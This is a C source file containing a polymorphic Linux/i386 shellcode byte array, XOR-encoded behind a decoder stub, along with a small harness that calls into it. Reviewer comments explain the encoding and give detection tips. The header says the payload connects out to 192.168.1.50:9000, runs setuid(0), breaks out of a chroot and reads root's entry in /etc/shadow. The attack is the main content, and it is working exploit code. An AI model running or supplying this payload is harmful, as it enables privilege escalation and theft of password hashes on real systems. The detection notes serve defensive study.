/*
 * libShellCode is an ORK's project!
 * For comments, bug reports, etc ... contact me at orkmailkatamailcom
 *
 * This is a Linux/i386 polymorphic shellcode that opens a connection to
 * 192.168.1.50:9000, calls setuid(0), then escapes from a chroot, executes
 * /bin/grep root /etc/shadow and calls exit(0).
 *
 * Reviewer notes (defensive reading of this listing):
 *  - The behaviour list above is the author's description. What the bytes
 *    themselves show directly is the decoder stub and, once decoded, the
 *    trailing command string; the middle of the payload is not annotated here.
 *  - 192.168.1.50 is a private (RFC 1918) address baked into the payload, so
 *    the sample as published only reaches a host on the local network.
 */

/*
 * Payload bytes: 225 in total, plus the terminating NUL the string literal adds.
 *
 * Layout, as read from the bytes:
 *  - Bytes 0..26 are an unencoded decoder stub. It uses a jump-forward /
 *    call-back / pop sequence to learn its own address, then runs a loop that
 *    XORs each of the following 0xc6 (198) bytes with the one-byte key 0x11.
 *  - Bytes 27..224 are the encoded body. The last 26 of them decode to the
 *    string "/bin/grep root /etc/shadow".
 *
 * Detection consequences:
 *  - No path or command string is readable in the raw array, so plain string
 *    matching on "/etc/shadow" or "/bin/grep" misses it. Signatures need to
 *    target the stub bytes or scan after single-byte XOR decoding.
 *  - The stub rewrites the array in place, so the payload only runs from memory
 *    that is both writable and executable.
 *  - Going by the header's description, the runtime behaviour to alert on would
 *    be an outbound TCP connection, setuid(0), and an execve of /bin/grep
 *    naming /etc/shadow.
 */
char shellcode[]=
    "\xeb\x14\x5e\x31\xc9\xb0\x11\x89\xf3\xb1\xac\x01\xce\xb1\xc6\x30"
    "\x03\x43\xe2\xfb\xeb\x05\xe8\xe7\xff\xff\xff\x20\xca\xe6\xf2\xa1"
    "\x77\x42\x52\x42\x52\x42\x98\xf0\x5a\xdc\x91\x98\xd6\x20\xd8\x77"
    "\xa8\x32\x39\x79\xd1\xb9\x10\x23\x77\x40\x52\x77\x42\x98\xf0\xa1"
    "\x01\x41\x40\x46\x98\xf0\x52\xa1\x77\xdc\x91\x98\xea\x98\xc8\xa1"
    "\x2e\x58\xdc\x91\x50\xf3\xe9\x20\xd1\x20\xca\xa1\x06\xdc\x91\x20"
    "\xd1\x42\x79\x7b\x70\x78\x7d\x98\xf2\xa1\x36\xdc\x91\x20\xd1\xa1"
    "\x2c\xdc\x91\x20\xd1\x20\xca\x20\xd8\xa0\x1b\x41\x79\x3f\x3f\x3e"
    "\x3e\xf3\xe8\x98\xf2\xa1\x1d\xdc\x91\x20\xd1\x20\xca\x7b\x3f\x98"
    "\xf2\xa1\x2c\xdc\x91\x20\xd1\x99\x57\x0b\x98\x67\x0a\x98\xe2\x99"
    "\x57\x18\x91\xd2\x1b\x98\x4f\x0e\x99\x57\x1f\x91\xd2\x14\x98\x4f"
    "\x32\x98\x57\x36\xa1\x1a\x98\xe2\x9c\x5f\x0a\x9c\x47\x36\xdc\x91"
    "\x20\xd1\x20\xca\x51\xdc\x91\x3e\x73\x78\x7f\x3e\x76\x63\x74\x61"
    "\x31\x63\x7e\x7e\x65\x31\x3e\x74\x65\x72\x3e\x62\x79\x70\x75\x7e"
    "\x66";

/*
 * Test harness: points a function pointer at the byte array above and calls it.
 *
 * NOTE(review): `(char *)f = shellcode;` assigns through a cast expression.
 * A cast does not yield an lvalue in ISO C; this form depended on an old GNU
 * extension, so current compilers are expected to reject it. Confirm against
 * the toolchain in use.
 * NOTE(review): main is declared without a return type (pre-C99 implicit int)
 * and has no return statement.
 * NOTE(review): shellcode[] is an ordinary initialised data object. On systems
 * that map data pages non-executable, the indirect call below typically faults
 * instead of running the payload.
 */
main()
{
    void (*f)();            /* unprototyped function pointer used as the entry */
    (char *)f = shellcode;  /* aim the pointer at the first payload byte */
    f();                    /* transfer control into the array */
}